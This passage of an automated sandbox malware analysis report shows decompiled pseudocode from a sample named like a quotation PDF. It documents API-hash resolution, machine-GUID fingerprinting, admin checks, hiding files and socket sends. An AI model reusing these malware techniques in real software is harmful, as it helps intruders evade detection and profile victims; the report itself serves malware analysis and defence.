				void* _t7;
				void* _t16;

				_t16 = E00402B7C(0x208);
				if(_t16 == 0) {
					L4:
					_t4 = 0;
				} else {
					E0040338C(_t16, 0, 0x104);
					_t1 =  &_v8; // 0x4143e8
					_v8 = 0x208;
					_t7 = E00406069(_t16, _t1); // executed
					if(_t7 == 0) {
						E00402BAB(_t16);
						goto L4;
					} else {
						_t4 = _t16;
					}
				}
				return _t4;
			}

0x00406340
0x00406345
0x00406373
0x00406373
0x00406347
0x0040634f
0x00406354
0x00406357
0x0040635c
0x00406366
0x0040636d
0x00000000
0x00406368
0x00406368
0x00406368
0x00406366
0x0040637a

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

_wmemset.LIBCMT ref: 0040634F

Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082

Strings

CA, xrefs: 00406354, 0040635A

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser_wmemset
String ID: CA
API String ID: 2078537776-1052703068
Opcode ID: ea15dbf965de6c39536eadaef71d36bb12a2dd1a9f609459e064ebb7523f79d3
Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
Opcode Fuzzy Hash: ea15dbf965de6c39536eadaef71d36bb12a2dd1a9f609459e064ebb7523f79d3
Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD

Uniqueness

Uniqueness Score: -1.00%

Function 00406086, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
				int _t7;
				void* _t8;

				E004031E5(_t8, 9, 0xecae3497, 0, 0);
				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
				return _t7;
			}

0x00406094
0x004060a8
0x004060ab

APIs

GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8

Strings

IDA, xrefs: 00406086

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID: IDA
API String ID: 4114910276-365204570
Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95

Uniqueness

Uniqueness Score: -1.00%

Function 00402C03, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402C03(struct HINSTANCE__* _a4, char _a8) {
				_Unknown_base(*)()* _t5;
				void* _t6;

				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
				_t1 =  &_a8; // 0x403173
				_t5 = GetProcAddress(_a4,  *_t1); // executed
				return _t5;
			}

0x00402c10
0x00402c15
0x00402c1b
0x00402c1e

APIs

GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B

Strings

s1@, xrefs: 00402C15

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: s1@
API String ID: 190572456-427247929
Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4

Uniqueness

Uniqueness Score: -1.00%

Function 00404A52, Relevance: 3.1, APIs: 2, Instructions: 63
registryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00404A52(void* _a4, char* _a8, char* _a12) {
				void* _v8;
				int _v12;
				void* __ebx;
				char* _t10;
				long _t13;
				char* _t27;

				_push(_t21);
				_t27 = E00402B7C(0x208);
				if(_t27 == 0) {
					L4:
					_t10 = 0;
				} else {
					E00402B4E(_t27, 0, 0x208);
					_v12 = 0x208;
					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
					if(_t13 != 0) {
						E00402BAB(_t27);
						goto L4;
					} else {
						E004031E5(0, 9, 0xfe9f661a, 0, 0);
						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
						E00404A39(_v8); // executed
						_t10 = _t27;
					}
				}
				return _t10;
			}

0x00404a56
0x00404a65
0x00404a6a
0x00404ad1
0x00404ad1
0x00404a6c
0x00404a71
0x00404a79
0x00404a85
0x00404a9a
0x00404a9e
0x00404acb
0x00000000
0x00404aa0
0x00404aac
0x00404abc
0x00404ac1
0x00404ac6
0x00404ac6
0x00404a9e
0x00404ad9

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
Opcode ID: d488a9f9e3e4912de19e98427526cb377b3f09abeed86899b322f2e70aeae98a
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: d488a9f9e3e4912de19e98427526cb377b3f09abeed86899b322f2e70aeae98a
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Uniqueness

Uniqueness Score: -1.00%

Function 00402BAB, Relevance: 3.0, APIs: 2, Instructions: 11
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402BAB(void* _a4) {
				void* _t3;
				char _t5;

				if(_a4 != 0) {
					_t5 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
					return _t5;
				}
				return _t3;
			}

0x00402bb2
0x00402bc0
0x00000000
0x00402bc0
0x00402bc7

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
RtlFreeHeap.NTDLL(00000000), ref: 00402BC0

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
Instruction ID: 8dd5a347e09044be93d5ac0bfd75615970d35e99714971ab129ae27a0189db5c
Opcode Fuzzy Hash: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
Instruction Fuzzy Hash: 7FC01235000A08EBCB001FD0E90CBE93F6CAB8838AF808020B60C480A0C6B49090CAA8

Uniqueness

Uniqueness Score: -1.00%

Function 004060BD, Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E004060BD(void* __eflags) {
				signed int _v8;
				char _v12;
				short _v16;
				char _v20;
				void* __ebx;
				intOrPtr* _t12;
				signed int _t13;
				intOrPtr* _t14;
				signed int _t15;
				void* _t24;

				_v16 = 0x500;
				_v20 = 0;
				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				_v8 = _t13;
				if(_t13 != 0) {
					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t15;
					E0040604F(_v12);
					return _v8;
				}
				return _t13;
			}

0x004060c6
0x004060d5
0x004060d8
0x004060f4
0x004060f6
0x004060fb
0x0040610a
0x00406115
0x0040611c
0x0040611e
0x00406121
0x00000000
0x0040612a
0x0040612f

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID: CheckMembershipToken
String ID:
API String ID: 1351025785-0
Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764

Uniqueness

Uniqueness Score: -1.00%

Function 00403C62, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
				void* _t3;
				int _t5;

				_t3 = E00403D4D(__eflags, _a4); // executed
				if(_t3 == 0) {
					__eflags = 0;
					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
					_t5 = CreateDirectoryW(_a4, 0); // executed
					return _t5;
				} else {
					return 1;
				}
			}

0x00403c68
0x00403c70
0x00403c78
0x00403c82
0x00403c8b
0x00403c8f
0x00403c72
0x00403c76
0x00403c76

APIs

CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4

Uniqueness

Uniqueness Score: -1.00%

Function 0040642C, Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040642C(void* __eflags) {
				short _v40;
				intOrPtr* _t6;
				void* _t10;

				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
				 *_t6( &_v40); // executed
				return 0 | _v40 == 0x00000009;
			}

0x0040643c
0x00406445
0x00406454

APIs

GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5

Uniqueness

Uniqueness Score: -1.00%

Function 00404EEA, Relevance: 1.5, APIs: 1, Instructions: 16
networkCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t5;

				_t5 = _a12;
				if(_t5 == 0) {
					_t5 = E00405D0B(_a8) + 1;
				}
				__imp__#19(_a4, _a8, _t5, 0); // executed
				return _t5;
			}

0x00404eed
0x00404ef2
0x00404efd
0x00404efd
0x00404f07
0x00404f0e

APIs

send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98

Uniqueness

Uniqueness Score: -1.00%

Function 00403BD0, Relevance: 1.5, APIs: 1, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
				int _t6;
				void* _t7;

				E004031E5(_t7, 0, 0xc9143177, 0, 0);
				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
				return _t6;
			}

0x00403bdd
0x00403beb
0x00403bee

APIs

MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664

Uniqueness

Uniqueness Score: -1.00%

Function 00404DF3, Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Uniqueness

Uniqueness Score: -1.00%

Function 0040427D, Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040427D(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
				return _t4;
			}

0x0040428a
0x00404297
0x0040429a

APIs

SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8

Uniqueness

Uniqueness Score: -1.00%

Function 00404A19, Relevance: 1.5, APIs: 1, Instructions: 13
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404A19(void* _a4, short* _a8, void** _a12) {
				long _t5;
				void* _t6;

				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
				return _t5;
			}

0x00404a27
0x00404a35
0x00404a38

APIs

RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658

Uniqueness

Uniqueness Score: -1.00%

Function 00403C40, Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403C40(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
				_t4 = FindCloseChangeNotification(_a4); // executed
				return _t4;
			}

0x00403c4d
0x00403c55
0x00403c58

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4

Uniqueness

Uniqueness Score: -1.00%

Function 00403C08, Relevance: 1.5, APIs: 1, Instructions: 12
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403C08(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
				_t4 = DeleteFileW(_a4); // executed
				return _t4;
			}

0x00403c15
0x00403c1d
0x00403c20

APIs

DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8

Uniqueness

Uniqueness Score: -1.00%

Function 00402C1F, Relevance: 1.5, APIs: 1, Instructions: 12
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402C1F(WCHAR* _a4) {
				struct HINSTANCE__* _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
				_t4 = LoadLibraryW(_a4); // executed
				return _t4;
			}

0x00402c2c
0x00402c34
0x00402c37

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Uniqueness

Uniqueness Score: -1.00%

Function 00403BEF, Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403BEF(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
				_t4 = FindClose(_a4); // executed
				return _t4;
			}

0x00403bfc
0x00403c04
0x00403c07

APIs

FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4

Uniqueness

Uniqueness Score: -1.00%

Function 00403BB7, Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403BB7(WCHAR* _a4) {
				long _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xc6808176, 0, 0);
				_t4 = GetFileAttributesW(_a4); // executed
				return _t4;
			}

0x00403bc4
0x00403bcc
0x00403bcf

APIs

GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4

Uniqueness

Uniqueness Score: -1.00%

Function 004049FF, Relevance: 1.5, APIs: 1, Instructions: 11
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004049FF(void* _a4) {
				long _t3;
				void* _t4;

				E004031E5(_t4, 9, 0xd980e875, 0, 0);
				_t3 = RegCloseKey(_a4); // executed
				return _t3;
			}

0x00404a0d
0x00404a15
0x00404a18

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Uniqueness

Uniqueness Score: -1.00%

Function 00403B64, Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

